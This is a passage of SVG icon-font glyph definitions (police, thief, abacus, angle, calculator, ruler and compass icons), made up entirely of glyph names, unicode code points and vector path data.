<glyph glyph-name="police-van" horiz-adv-x="1000" unicode="&#xebd3;" d="M826 618c17-47 35-92 52-138 13-35 27-70 40-105 2-6 5-9 12-8 12 0 24 0 36 0 30-1 36-23 34-45-1-6-6-4-9-4-22 0-44 0-66 0-288 0-575 0-863 0-16 0-14-2-14 14 0 96 0 192 0 287 0 20 5 26 25 26 253 0 506 0 759 0 3 0 6 0 9-1 7-1 11-6 11-13 0-8-5-12-12-13-4 0-9 0-14 0z m-87-251c33 0 66 0 98 0 19 0 25 7 18 25-23 64-46 128-70 192-4 12-8 15-22 15-42 1-84 1-126 1-13 0-18-5-18-17 0-66 0-131 0-197 0-15 5-19 20-19 34 0 67 0 100 0z m-465 10c21 11 39 21 58 31 6 4 12 4 19 0 16-9 32-18 48-26 3-1 5-4 9-2-3 14-4 29-8 43-6 21-2 36 15 49 12 9 22 22 33 34-19 2-37 5-55 7-13 2-21 5-26 18-7 18-17 34-26 53-8-17-17-31-23-46-6-17-16-26-34-25-5 0-9-1-14-2-12-3-24-2-35-6 10-11 19-23 30-31 18-14 24-30 17-52-5-13-5-28-8-45z m250-86c155 0 309 0 464 0 10 0 12-3 12-12-1-28 0-55 0-83 0-12-5-22-15-29-6-4-9-5-12 4-13 43-42 70-86 80-57 12-115-24-130-81-2-6-4-9-11-9-107 1-214 1-320 0-7 0-10 2-12 9-13 52-57 87-110 87-55-1-98-35-112-88-1-5-3-8-10-8-56 1-113 1-170 0-8 0-12 3-12 11 0 13 0 25 0 38 0 8 4 11 12 11 8 0 17 1 25 0 9-1 11 3 11 11-1 16 0 32-1 48 0 8 2 11 10 11 122 0 244 0 366 0 34 0 67 0 101 0z m342-72c44-1 81-37 81-82 0-45-37-81-82-81-44 0-81 37-81 81 0 45 37 82 82 82z m0-112c16 1 30 15 29 31 0 16-14 30-30 29-16 0-30-14-30-30 1-16 15-30 31-30z m-644 33c2 45 39 81 84 79 45-3 81-40 79-84-2-45-40-81-84-79-45 2-81 39-79 84z m111-3c0 17-14 31-30 30-16 0-29-13-30-29 0-16 14-31 30-31 16 0 30 14 30 30z" />
<glyph glyph-name="police" horiz-adv-x="1000" unicode="&#xebd4;" d="M415 300c-5-3-7-8-5-14 5-13 15-21 27-27 20-10 42-13 64-13 24 0 47 3 68 16 9 5 17 13 21 23 3 6 2 11-4 15-5 4-10 2-14-3-14-17-34-24-55-26-33-3-64 1-88 27-4 5-9 6-14 2z m182 64c16 0 29 13 29 29 0 16-13 29-29 29-15 0-29-13-29-29 0-16 13-29 29-29z m-108-220z m-282 487c12-11 26-21 40-30 5-3 10-5 16-5 31-2 62-4 93-5 58-3 116-6 174-4 65 2 130 5 194 9 4 0 8 0 11 2 16 10 32 20 46 33 7 7 9 14 5 24-8 22-18 42-29 62-14 25-33 43-61 55-51 20-102 45-153 67-34 15-66 14-100 0-57-23-112-49-168-74-10-5-18-11-25-20-20-28-36-58-49-89-4-11-2-18 6-25z m208 92c0 0 0 1 0 2 0 18 0 19 18 17 20-1 34 5 42 23 4 8 7 18 18 18 10-1 14-10 18-18 12-21 21-26 49-21 8 1 10-1 11-8 3-20 1-38-8-55-12-24-30-41-53-54-11-6-23-6-35-1-40 20-59 52-60 97z m-22-359c16 0 29 13 28 29 0 16-13 29-29 29-15 0-29-14-28-29 0-16 13-29 29-29z m260-233z m-57-42c12-4 25-7 40-12-8 12-14 21-20 31-4 6-7 15-14 19-7 4-15-4-22-7-55-17-110-15-164 4-3 2-7 5-11 1-13-15-25-30-40-47 16 3 28 6 39 10 11 3 20 0 27-8 21-21 43-41 63-62 5-5 8-6 13 0 19 21 38 41 57 62 9 10 19 13 32 9z m297-114c-16 35-30 70-49 103-4 8-10 13-19 15-56 15-113 26-172 38 17-26 33-51 49-75 7-12 8-21 2-29-7-9-16-11-29-7-25 7-51 15-76 22-6 2-10 1-14-4-20-21-40-43-60-65-3-3-5-7-5-12 1-34 1-68 0-102 0-8 3-9 10-9 86 3 170 21 250 54 38 16 74 35 107 60 4 2 8 4 6 11z m-176-67c-7-2-13 0-18 3-22 12-33 30-33 55 0 8 1 15 10 11 12-1 20 3 25 13 8 14 14 14 21 0 6-11 14-15 25-12 8 1 10-3 11-10 2-24-18-53-41-60z m-363 224z m116-153c-19 19-39 38-57 57-5 5-10 6-16 4-29-7-58-14-86-21-10-3-18 0-24 8-5 8-5 18 1 26 3 4 5 7 8 10 19 22 37 45 58 69-13-2-22-4-32-5-47-9-94-18-141-30-14-4-24-11-31-25-15-32-29-66-42-99-2-5-1-8 3-11 19-14 38-27 59-38 94-48 193-70 298-74 7 0 8 3 8 9 0 35 0 71 0 107 0 5-2 9-6 13z m-220 385c5-1 7-4 8-9 5-21 12-41 20-60 43-96 114-149 211-151 90 1 154 31 199 99 23 34 36 72 44 111 1 7 4 9 9 12 28 11 46 31 54 60 4 14 4 28 3 43-3 31-13 59-39 79-10 8-22 13-36 12-17-2-35-2-52-3-63-3-126-8-190-7-68 1-137 4-205 10-35 2-56-13-74-40-4-7-7-15-9-23-4-16-5-31-4-47 3-41 22-71 61-86z m-23 128c2 8 6 15 12 21 4 4 8 10 12 8 5-1 3-8 3-13 3-22 5-44 12-65 2-6 5-13 9-18 3-4 7-7 13-6 6 1 8 5 9 10 2 11 4 23 6 35 4 26 4 26 28 16 51-21 103-36 158-38 57-3 111 12 163 36 5 2 11 4 15 7 6 4 8 2 10-4 4-15 8-31 12-46 2-6 3-16 12-16 9 0 11 9 13 16 9 27 10 55 12 82 1 3 1 6 1 10 14-5 23-14 28-27 10-21 13-44 6-67-7-24-23-37-47-40-8-1-11-4-12-13-4-32-13-62-27-92-32-66-84-104-158-109-66-5-124 14-169 65-29 34-46 73-57 116-2 9-1 20-6 28-5 9-17 5-26 8-17 8-28 19-34 37-5 20-5 40 2 59z" />
<glyph glyph-name="thief-alt" horiz-adv-x="1000" unicode="&#xebd5;" d="M892 735c-64 33-129 45-197 15-3-1-6-3-8-3-42 62-114 103-195 103-92 0-171-52-210-128-3-6-6-9-6-13-2-9 8-13 30-25 18-9 32-12 52-4 35 13 71 9 104-7 20-10 40-10 59-1 35 18 72 21 107 7 19-7 32-5 47 4 6 3 12 5 18 8 7 6 14 8 20 8 9-1 17-7 26-17 31-39 65-77 98-115 4-4 8-13 14-10 8 4 6 13 4 19-1 12-4 24-8 36-11 36-29 69-55 99 34 10 69 7 100 20l0 4z m-540-334c84-61 200-59 285 4 79 58 118 167 88 255-16-24-32-45-46-67-8-13-17-24-30-30-41-21-84-24-126-2-22 11-41 11-62-1-46-26-139-16-162 42-8 21-25 37-40 58-30-90 11-200 93-259z m111 182c20 15 21 49 2 65-32 28-99 27-130-1-20-18-21-42 0-60 18-17 40-22 67-22 21-1 42 4 61 18z m-108 16c-17 10-17 24 0 35 14 9 30 12 47 12 14 1 27-2 40-9 17-10 18-31 0-40-29-15-59-14-87 2z m230-34c22-1 43 4 61 18 25 19 26 46 1 66-31 26-95 26-127 0-23-19-23-46 0-65 19-15 41-20 65-19z m-50 67c14 11 31 14 47 14 18 0 35-3 49-13 13-10 14-20 1-32-22-19-75-18-97 1-12 10-12 20 0 30z m-330-361c87-41 178-62 273-65 108-4 212 16 314 54 13 5 11 10 5 19-35 46-80 78-135 97-11 4-18 0-27-7-92-69-194-69-287 1-9 7-16 8-27 5-48-16-87-43-121-81-10-12-9-16 5-23z m627-280c-62-17-126-29-191-37-54-6-108-9-162-7-54-2-108 1-162 7-65 8-129 20-192 37-14 4-17 2-16-12 1-11 0-22 0-32 0-31 0-41 14-50l0 0c86-29 208-47 343-47h26c135 0 257 18 343 47l0 0c14 9 14 19 14 50 0 10-1 21 0 32 1 14-3 16-17 12z m-8 192c-29-10-59-21-89-30-84-23-170-35-256-32-87-3-172 9-256 32-31 9-60 20-89 30-11 4-16 4-19-9-6-27-6-54-6-81 0-9 5-11 12-13 117-35 236-52 358-48 121-4 240 13 357 48 8 2 13 4 13 13 0 27 0 54-7 81-3 13-7 13-18 9z" />
<glyph glyph-name="thief" horiz-adv-x="1000" unicode="&#xebd6;" d="M896 534c2 22-6 29-26 26h-16c-17-2-22 4-24 21-4 47-20 89-47 128-61 86-167 136-276 140v1c-2 0-5 0-7 0l-7 0v-1c-109-4-215-54-276-140-27-39-43-81-47-128-1-17-7-23-24-21h-16c-20 3-28-4-26-26 2-28 1-57 0-85-1-16 3-23 21-23 35 1 35-1 32-36-13-136 13-263 87-379 49-77 114-135 206-155 15-3 29-4 43-5v-1c3 0 5 0 7 0l7 0v1c14 1 28 2 43 5 92 20 158 78 206 155 74 116 100 243 87 379-3 35-2 37 32 36 18 0 22 7 21 23-1 28-1 57 0 85z m-396-642c-82 1-145 44-200 110 78-6 147 6 200 64l0 1 0-1c53-58 122-70 200-64-55-66-118-109-200-110z m220 137c-10-15-17-17-34-11-53 21-102 48-151 76-10 6-19 9-28 10v3c-2 0-5-1-7-1-2 0-4 1-7 1v-3c-9-1-18-4-28-10-49-28-98-55-151-76-16-6-24-3-34 11-36 57-61 118-73 189 123-67 251-43 293 27 43-70 171-94 294-27-13-71-37-132-74-189z m80 354c-54 27-109 30-165 18-56-13-105-38-135-91-30 53-79 78-135 91-56 12-111 9-165-18-1 44-1 44 38 44h524c40 0 40 0 38-44z" />
<glyph glyph-name="abacus-alt" horiz-adv-x="1000" unicode="&#xebd7;" d="M572 639c-10 26-36 44-65 44s-55-18-66-44h-49c-10 26-36 44-65 44s-55-18-66-44h-53c-10 26-36 44-65 44s-55-18-66-44h-77v-54h77c11-26 36-44 66-44s55 18 65 44h53c11-26 36-44 66-44s55 18 65 44h49c11-26 36-44 66-44s55 18 65 44h428v54h-428z m285-480c-29 0-55-18-65-44h-53c-11 26-36 44-66 44s-55-18-65-44h-49c-11 26-36 44-66 44s-55-18-65-44h-428v-54h428c10-26 36-44 65-44s55 18 66 44h49c10-26 36-44 65-44s55 18 66 44h53c10-26 36-44 65-44s56 18 66 44h77v54h-77c-10 26-36 44-66 44z m-86 260c-30 0-55-18-66-44h-48c-11 26-36 44-66 44s-55-18-66-44h-253c-10 26-36 44-65 44s-55-18-66-44h-141v-54h141c11-26 36-44 66-44s55 18 65 44h253c11-26 36-44 66-44s55 18 66 44h48c11-26 36-44 66-44s55 18 66 44h163v54h-163c-11 26-36 44-66 44z" />
<glyph glyph-name="abacus" horiz-adv-x="1000" unicode="&#xebd8;" d="M962 83h-10v681c0 20-17 37-37 37-21 0-38-17-38-37v-91h-110c-1 18-18 32-37 32-20 0-36-14-38-32h-176c-2 18-18 32-37 32-20 0-36-14-38-32h-50c-2 18-18 32-38 32-19 0-36-14-37-32h-193v91c0 20-17 37-38 37-20 0-37-17-37-37v-681h-10c-21 0-38-16-38-36v-112c0-20 17-36 38-36h924c21 0 38 16 38 36v112c0 20-17 36-38 36z m-647 517v-4c0-20 17-36 38-36 21 0 38 16 38 36v4h50v-4c0-20 17-36 38-36 21 0 37 16 37 36v4h176v-4c0-20 17-36 38-36 21 0 38 16 38 36v4h109v-180h-235c-2 18-18 32-38 32-19 0-35-14-37-32h-176c-2 18-18 32-38 32-19 0-36-14-37-32h-51c-2 18-18 32-38 32-19 0-35-14-37-32h-67v180h192z m-192-253h67v-4c0-20 17-36 37-36 21 0 38 16 38 36v4h50v-4c0-20 17-36 38-36 21 0 38 16 38 36v4h176v-4c0-20 17-36 37-36 21 0 38 16 38 36v4h235v-264h-754v264z" />
<glyph glyph-name="angle-180" horiz-adv-x="1000" unicode="&#xebd9;" d="M873 157c-31 178-186 314-373 314-187 0-342-136-373-314h-127v-107h1000v107h-127z m-679 0c30 142 156 248 306 248 151 0 276-106 307-248h-613z m173 444l21 8v-57h-24c0-2-1-4-1-5 0-2 0-3 0-5 0-2 0-3 0-5 0-1 1-3 1-5h69c1 2 1 4 1 5 0 2 0 3 0 5 0 2 0 3 0 5 0 1 0 3-1 5h-23v87h-4l-47-21c1-3 2-6 3-9 2-3 3-5 5-8z m96-63c4-3 9-5 14-6s10-2 15-2c5 0 10 1 15 2 5 1 9 3 13 6 4 3 7 6 9 10 3 4 4 9 4 15 0 4-1 8-2 12-1 3-3 6-4 8-2 3-4 5-7 7-2 2-5 3-7 4 4 3 8 6 11 11 2 4 4 9 4 14 0 5-1 9-3 13-2 3-4 7-8 9-3 3-7 5-11 6-4 2-9 2-14 2s-10 0-14-2c-5-1-9-3-12-6-3-2-6-6-7-9-2-4-3-8-3-13 0-5 1-10 4-14 3-5 6-8 10-11-2-1-4-2-7-4s-4-4-6-7c-2-2-4-5-5-9s-1-7-1-11c0-6 1-11 3-15 2-4 5-7 9-10z m18 90c2 2 6 3 11 3s8-1 11-3c2-3 3-6 3-9 0-5-1-9-4-11-2-3-6-5-10-6-4 1-8 3-11 6-2 2-4 6-4 11 0 3 2 6 4 9z m-2-50c3 3 7 6 13 7 5-1 9-4 12-7 4-3 6-8 6-13 0-5-2-9-5-12-3-3-7-4-13-4-6 0-10 1-13 4s-5 7-5 12c0 5 2 9 5 13z m79-32c3-5 7-9 13-12 5-2 11-4 19-4s13 2 19 4c5 3 10 7 13 12s6 10 8 17c2 7 3 14 3 22 0 8-1 15-3 22-2 7-4 13-8 17-3 5-7 9-13 12s-11 4-19 4c-7 0-13-1-19-4-5-3-10-7-13-12s-6-10-8-17c-2-7-2-14-2-22 0-8 0-15 2-22 2-7 4-12 8-17z m19 66c3 5 7 8 13 8 6 0 10-3 13-8 3-6 5-15 5-27 0-12-2-21-5-27-3-5-7-8-13-8-6 0-10 3-13 8-3 6-5 15-5 27 0 12 2 21 5 27z m75-3c2-2 4-4 7-5 3-2 7-2 10-2s7 0 10 2c3 1 5 3 8 5s4 5 5 7c1 3 2 7 2 10s-1 7-2 10c-1 3-3 5-5 7-3 3-5 4-8 6-3 1-7 2-10 2s-7-1-10-2c-3-2-5-3-7-6-2-2-4-4-5-7-2-3-2-7-2-10s0-7 2-10c1-2 3-5 5-7z m10 25c2 2 4 3 7 3s5-1 7-3c2-2 3-5 3-8s-1-6-3-8c-2-2-4-3-7-3s-5 1-7 3c-2 2-3 5-3 8s1 6 3 8z" />
<glyph glyph-name="angle-45" horiz-adv-x="1000" unicode="&#xebda;" d="M764 269c2 0 5 0 7 0 3 0 5 0 7 0s5 1 7 1v29h15c0 2 1 4 1 6 0 2 0 4 0 6 0 5 0 9-1 13h-15v33c-2 0-5 0-7 1-3 0-5 0-8 0-2 0-4 0-7 0-2-1-4-1-7-1v-33h-29l43 86c-4 3-8 5-13 7-4 1-9 2-13 3l-59-118 2-3h69v-29c3 0 5-1 8-1z m65 69l3-3c4 2 7 4 11 4 4 1 8 2 12 2 10 0 17-2 22-6 4-4 7-9 7-17 0-3-1-6-2-9-1-3-3-5-5-8s-6-4-11-5c-4-1-9-2-15-2-5 0-9 0-14 1-4 1-9 3-13 4-2-4-4-8-5-12-1-4-2-8-3-13 4-1 7-2 10-2 4-1 7-2 10-2 3-1 6-1 9-1 2-1 5-1 7-1 9 0 18 1 26 4 7 2 14 5 19 10 6 4 10 9 13 16 3 6 5 14 5 22 0 7-2 14-4 19-2 5-5 10-9 13-4 4-9 7-14 9-6 2-12 3-19 3-2 0-4-1-6-1-1 0-4 0-6-1l1 30h48c0 4 1 8 1 12 0 5-1 9-1 13h-74l-3-79z m118 41c2-3 6-5 10-6 3-2 7-3 12-3s8 1 12 3c4 1 7 3 10 6 3 3 5 6 7 10 1 4 2 8 2 12 0 4-1 8-2 12-2 4-4 7-7 10s-6 5-10 7c-4 1-8 2-12 2s-9-1-12-2c-4-2-8-4-10-7-3-3-5-6-7-10-2-4-2-8-2-12 0-4 0-8 2-12 2-4 4-7 7-10z m13 32c2 2 5 4 9 4 3 0 6-2 9-4 3-3 4-6 4-10 0-4-1-7-4-10-3-2-6-4-9-4-4 0-7 2-9 4-3 3-4 6-4 10 0 4 1 7 4 10z m-418-66l341 380-159 27-724-804 1000 0v137h-302c-26 102-81 192-156 260z m-235-260l168 186c55-50 96-114 120-186h-288z" />
<glyph glyph-name="angle-90" horiz-adv-x="1000" unicode="&#xebdb;" d="M581 558c5-5 11-8 17-11 7-2 14-4 21-4 6 0 10 1 14 2 4 1 7 3 10 5s6 3 8 5c2 3 4 5 6 7-2-7-4-14-7-21-4-6-8-12-13-17-5-5-12-9-19-12-8-3-16-5-25-5-2-5-3-10-3-14 0-3 1-6 1-8 1-3 2-6 2-9 18 1 33 5 46 11 12 6 23 14 31 24s15 22 19 36c4 14 6 28 6 44 0 25-5 44-17 56-11 13-27 19-49 19-8 0-16-1-24-4s-15-7-21-12c-6-5-11-12-14-20s-6-17-6-27c0-10 2-19 5-26s7-14 12-19z m29 70c5 5 12 8 20 8 8 0 15-3 20-9 5-5 7-14 7-24 0-10-3-18-8-23-5-5-12-8-20-8-8 0-14 3-19 8s-8 13-8 24c0 11 3 19 8 24z m123-111c6-8 13-14 21-18 8-4 18-6 30-6s21 2 30 6c9 4 16 10 21 18s10 17 12 27 4 22 4 35-1 24-3 35c-3 10-7 19-13 27-5 8-12 14-20 18-9 5-19 7-30 7-12 0-22-2-30-7s-16-10-21-18c-6-8-10-17-13-27s-4-23-4-35c0-13 2-24 4-35 3-10 7-19 12-27z m30 104c6 9 12 13 21 13 9 0 16-4 21-13s7-23 7-42-2-33-7-42c-5-9-12-14-21-14-8 0-15 5-20 14-6 9-8 23-8 42 0 19 2 33 7 42z m119-5c3-3 7-6 12-8 5-2 10-3 15-3 5 0 10 1 15 3s9 5 13 8 6 8 8 13 3 9 3 14c0 6-1 11-3 16-2 4-5 9-8 12s-8 6-13 8c-5 2-10 3-15 3-5 0-10-1-15-3-5-2-9-5-12-8s-6-8-8-12c-2-5-3-10-3-16 0-5 1-10 3-14s4-9 8-13z m16 40c3 3 7 5 11 5s8-2 12-5 5-8 5-13c0-5-2-9-5-12-4-3-7-4-12-4s-8 1-11 4c-3 3-5 7-5 12 0 5 2 10 5 13z m-220-629c-23 250-215 452-461 490v333h-175v-1000h916v177h-280z m-461 0v375c183-36 325-187 347-375h-347z" />
<glyph glyph-name="angle" horiz-adv-x="1000" unicode="&#xebdc;" d="M281-11l533 861h-160l-620-1000h932v139h-685z" />
<glyph glyph-name="calculator-alt-1" horiz-adv-x="1000" unicode="&#xebdd;" d="M0 678v-294h289v294h-289z m222-158h-66v-68h-23v68h-66v22h66v68h23v-68h66v-22z m134 158v-294h288v294h-288z m207-195l-16-16-47 48-47-48-16 16 47 48-47 48 16 16 47-48 47 48 16-16-47-48 47-48z m148 195v-656h289v656h-289z m222-362h-155v23h155v-23z m0 68h-155v23h155v-23z m-933-68v-294h289v294h-289z m222-158h-155v22h155v-22z m134 158v-294h288v294h-288z m133-90h22v-23h-22v23z m22-114h-22v23h22v-23z m67 46h-156v22h156v-22z" />
<glyph glyph-name="calculator-alt-2" horiz-adv-x="1000" unicode="&#xebde;" d="M855 850h-709c-23 0-42-20-42-45v-910c0-25 19-45 42-45h709c23 0 42 20 42 45v910c0 25-19 45-42 45z m-494-878c0-12-9-21-19-21h-114c-11 0-20 9-20 21v79c0 12 9 22 20 22h114c10 0 19-10 19-22v-79z m0 172c0-11-9-21-19-21h-114c-11 0-20 10-20 21v80c0 12 9 21 20 21h114c10 0 19-9 19-21v-80z m0 165c0-11-9-21-19-21h-114c-11 0-20 10-20 21v80c0 11 9 21 20 21h114c10 0 19-10 19-21v-80z m216-337c0-12-9-21-20-21h-114c-10 0-19 9-19 21v79c0 12 9 22 19 22h114c11 0 20-10 20-22v-79z m0 172c0-11-9-21-20-21h-114c-10 0-19 10-19 21v80c0 12 9 21 19 21h114c11 0 20-9 20-21v-80z m0 165c0-11-9-21-20-21h-114c-10 0-19 10-19 21v80c0 11 9 21 19 21h114c11 0 20-10 20-21v-80z m215-337c0-12-9-21-19-21h-114c-11 0-20 9-20 21v79c0 12 9 22 20 22h114c10 0 19-10 19-22v-79z m0 172c0-11-9-21-19-21h-114c-11 0-20 10-20 21v80c0 12 9 21 20 21h114c10 0 19-9 19-21v-80z m0 165c0-11-9-21-19-21h-114c-11 0-20 10-20 21v80c0 11 9 21 20 21h114c10 0 19-10 19-21v-80z m0 231c0-17-12-31-28-31h-528c-15 0-28 14-28 31v156c0 16 13 30 28 30h528c16 0 28-14 28-30v-156z" />
<glyph glyph-name="calculator" horiz-adv-x="1000" unicode="&#xebdf;" d="M782 788h-564c-8 0-15-7-15-16v-844c0-8 7-16 15-16h564c8 0 15 8 15 16v844c0 9-7 16-15 16z m-510-86c0 9 7 16 16 16h423c9 0 16-7 16-16v-178c0-8-7-16-16-16h-423c-9 0-16 8-16 16v178z m280-281v-72c0-9-7-16-16-16h-72c-9 0-16 7-16 16v72c0 9 7 16 16 16h72c9 0 16-7 16-16z m-175-423c0-8-7-15-16-15h-72c-9 0-16 7-16 15v73c0 9 7 16 16 16h72c9 0 16-7 16-16v-73z m0 176c0-9-7-16-16-16h-72c-9 0-16 7-16 16v72c0 9 7 16 16 16h72c9 0 16-7 16-16v-72z m0 175c0-9-7-16-16-16h-72c-9 0-16 7-16 16v72c0 9 7 16 16 16h72c9 0 16-7 16-16v-72z m175-350c0-9-7-16-16-16h-72c-9 0-16 7-16 16v72c0 9 7 16 16 16h72c9 0 16-7 16-16v-72z m0 175c0-9-7-16-16-16h-72c-9 0-16 7-16 16v72c0 9 7 16 16 16h72c9 0 16-7 16-16v-72z m175-175c0-9-7-16-16-16h-72c-9 0-16 7-16 16v247c0 9 7 16 16 16h72c9 0 16-7 16-16v-247z m1 350c0-9-8-16-16-16h-73c-9 0-16 7-16 16v72c0 9 7 16 16 16h73c8 0 16-7 16-16v-72z" />
<glyph glyph-name="circle-ruler-alt" horiz-adv-x="1000" unicode="&#xebe0;" d="M253 515c101 60 212 79 330 60 42-7 82-20 120-37 3-1 8-1 10 1 5 5 10 12 14 18-136 71-341 80-508-30-88-57-151-134-188-229-21-54-31-109-31-165h27c4 30 6 60 12 88 28 127 99 225 214 294z m616-60l-18-23c78-86 118-186 120-299h29c-2 123-45 229-131 322z m8 139c-99-126-198-252-296-378l-13 8c15 19 29 37 43 55 85 108 169 216 253 323l13-8z m14-491c0 14-1 28-4 42-14 92-59 169-132 230-4 3-7 5-11 8-3-3-5-6-7-8-16-22-32-45-48-66-7-8-7-14 0-22 22-24 35-53 38-85 1-15 0-15-15-15h-119c-63 0-126 0-190 0-36 0-73 0-110 0-29 0-25-3-21 24 6 42 29 77 63 103 81 61 170 69 265 36 9-3 18-8 27-12 20 27 40 54 61 82-129 61-256 64-381-3-131-70-196-182-202-326h774c13 0 13 0 12 12z m-663 23c0-7-6-13-13-13s-14 6-14 13v23c0 8 6 13 14 13s13-5 13-13v-23z m57 0c0-7-6-13-13-13s-14 6-14 13v23c0 8 6 13 14 13s13-5 13-13v-23z m57 0c0-7-6-13-13-13s-14 6-14 13v23c0 8 6 13 14 13s13-5 13-13v-23z m58 0c0-7-7-13-14-13s-14 6-14 13v23c0 8 6 13 14 13s14-5 14-13v-23z m57 0c0-7-7-13-14-13s-14 6-14 13v23c0 8 6 13 14 13s14-5 14-13v-23z m57 0c0-7-6-13-14-13s-14 6-14 13v23c0 8 7 13 14 13s14-5 14-13v-23z m57 0c0-7-6-13-14-13s-14 6-14 13v23c0 8 7 13 14 13s14-5 14-13v-23z m57 0c0-7-6-13-14-13s-13 6-13 13v23c0 8 6 13 13 13s14-5 14-13v-23z m57 0c0-7-6-13-14-13s-13 6-13 13v23c0 8 6 13 13 13s14-5 14-13v-23z m57 0c0-7-6-13-14-13s-13 6-13 13v23c0 8 6 13 13 13s14-5 14-13v-23z m57 0c0-7-6-13-13-13s-14 6-14 13v23c0 8 6 13 14 13s13-5 13-13v-23z" />
<glyph glyph-name="circle-ruler" horiz-adv-x="1000" unicode="&#xebe1;" d="M535 703c16-3 32-5 47-9 19-4 38-10 58-15-8-19-14-36-22-53 12-5 23-10 34-15 8 18 15 34 22 52 37-18 70-41 101-70-14-13-27-26-40-38 10-10 19-18 27-27 12 12 25 26 38 40 31-35 54-72 72-114-17-7-33-14-51-21 5-12 9-23 13-35 18 7 34 13 52 20 14-43 21-87 21-133h-166c-3 85-38 153-105 202-45 33-96 47-151 44-120-7-227-112-226-247h-166c0 47 7 91 22 135l54-21c4 12 9 23 13 35-18 8-35 15-52 22 6 26 47 90 71 112 13-13 26-27 38-41 10 10 18 19 27 29-12 12-26 25-40 39 32 29 65 53 103 70 7-18 14-35 22-53l34 14c-7 18-14 36-22 55 22 6 43 11 65 16 12 3 24 4 37 7h17v-56h36v56h17z m-535-458c89 0 178 1 266 1 101 0 202 0 303 0 94 0 188 0 283 0 49 0 99 0 148-1v-247h-1000v247z m944-57h-888v-132h55v37h38v-37h37v75h37v-75h37v37h36v-37h38v76c6 0 10 0 15 0 22-1 22-1 22-23-1-17 0-35 0-53h36c0 4 1 6 1 9 0 30 0 29 28 29 7 0 9-2 9-9-1-10 0-19 0-29h37v75h37v-75h36c0 4 0 7 0 10 1 29 1 29 29 28 6 0 9-2 9-9-1-9 0-19 0-29h37v75h37v-75h37v37h37c0-11-1-20 0-30 0-3 3-7 4-7 11-1 21 0 33 0v75h37v-75h37v37h37v-37h55v132z" />
<glyph glyph-name="compass-alt-1" horiz-adv-x="1000" unicode="&#xebe2;" d="M240 83l-4-111 44-17 40 99c-6-2-13-3-20-3-25 0-47 13-60 32z m460-32c-8 0-15 2-22 4l40-100 44 17-4 108c-13-17-34-29-58-29z m-467-201l24 70-22 10-2-80z m532 81l-22-11 24-70-2 81z m-429 190c0-20-17-36-36-36s-36 16-36 36c0 19 16 35 36 35s36-16 36-35z m400 0c0-20-16-36-36-36-20 0-36 16-36 36 0 19 16 35 36 35s36-16 36-35z m-232 567c11 0 21-1 31-3v28h35v137h-122v-137h35v-26c7 1 14 1 21 1z m-135-167c0-25 7-48 19-67 15-27 40-48 70-59 15-5 30-8 46-8 13 0 25 2 37 5 30 9 56 27 73 52 16 21 25 48 25 77 0 73-60 133-135 133-74 0-135-60-135-133z m135 60c34 0 61-27 61-60s-27-60-61-60c-33 0-61 26-61 60s28 60 61 60z m-317-281v-51h52v17h72l-31-79c6 2 13 4 20 4 26 0 49-15 61-36l45 111h77v-53c0-9 7-16 15-16h4c8 0 15 7 15 16v53h75l46-113c12 22 35 38 62 38 6 0 12-2 18-3l-31 78h74v-17h52v51h-52v-17h-81l-51 124c-20-21-46-38-75-47l31-77h-68v36c0 8-7 15-15 15h-4c-8 0-15-7-15-15v-36h-70l33 81c-29 10-55 28-74 52l-54-133h-79v17h-52z" />
<glyph glyph-name="compass-alt-2" horiz-adv-x="1000" unicode="&#xebe3;" d="M318 483c-78-221-219-633-219-633s217 250 374 432c-89 103-136 158-139 164-7 12-12 24-16 37z m583-633s-259 753-268 769c-21 35-53 59-89 70v117c0 24-20 44-44 44-25 0-45-20-45-44v-118c-10-3-20-7-30-13-73-42-98-135-56-208 9-17 532-617 532-617z m-401 754c39 0 71-32 71-71s-32-71-71-71-71 31-71 71 31 71 71 71z" />
<glyph glyph-name="compass-alt-3" horiz-adv-x="1000" unicode="&#xebe4;" d="M145 43c2 3 4 6 5 10 21 45 42 91 62 136 1 3 3 6 4 8 38-10 75-21 113-32-47-104-89-211-144-315-7 30-13 58-19 86l-20 96c0 1-1 2-1 3v8z m340 807c3-4 7-8 7-12 1-28 1-56 1-85-31 7-62 6-93-2v44c0 10 0 19 0 29 0 18 1 19 17 26h68z m-45-432c-21-49-42-96-63-144 17-7 101-9 150 2-20 47-40 94-61 141 40 5 74 20 102 50 24-53 48-106 72-159 68 28 127 69 177 122 13-14 25-27 38-41-76-79-168-135-277-161-114-27-226-21-337 16 33 73 65 144 97 218 28-29 63-41 102-44z m-110 175c0 64 52 116 115 117 64 0 118-52 118-115 0-67-52-119-118-119-63 0-114 52-115 117z m163 0c0 25-21 46-45 46-27 1-48-20-48-47 0-25 21-46 46-46 26 0 47 21 47 47z m222-743l-141 318c38 12 75 23 112 35 7-15 15-31 22-47 15-34 30-69 46-103 5-10 6-19 3-29-13-56-25-112-37-168 0-1-1-3-1-4l-4-2z" />
<glyph glyph-name="compass-alt-4" horiz-adv-x="1000" unicode="&#xebe5;" d="M885-127l-48 88c13 14 17 36 7 54l-113 209h71c17 0 32 14 32 31 0 17-15 31-32 31h-105l-54 99c47 40 77 99 77 165 0 109-82 199-188 214v55c0 17-14 31-32 31-18 0-32-14-32-31v-54c-106-16-188-106-188-215 0-66 30-125 77-164l-54-100h-74c-18 0-32-14-32-31 0-17 14-31 32-31h40l-113-209c-10-18-6-40 7-54l-48-88c-4-8-1-17 7-21 2-1 5-2 7-2 6 0 12 3 14 8l48 88c2 0 5-1 7-1 17 0 34 9 42 25l137 254h246l137-254c8-16 25-25 42-25 2 0 5 1 7 1l47-88c3-5 9-8 14-8 3 0 6 1 8 2 8 4 11 13 7 21z m-474 413l30 55c19-5 39-8 59-8s40 3 59 8l30-55h-178z m61 113l28 51 28-51c-9-2-18-3-28-3-10 0-19 1-28 3z m140 44l-48 89c-10 19-30 30-52 30h-24c-22 0-42-11-52-30l-48-89c-28 28-45 65-45 107 0 85 70 154 157 154 86 0 157-69 157-154 0-42-17-80-45-107z" />
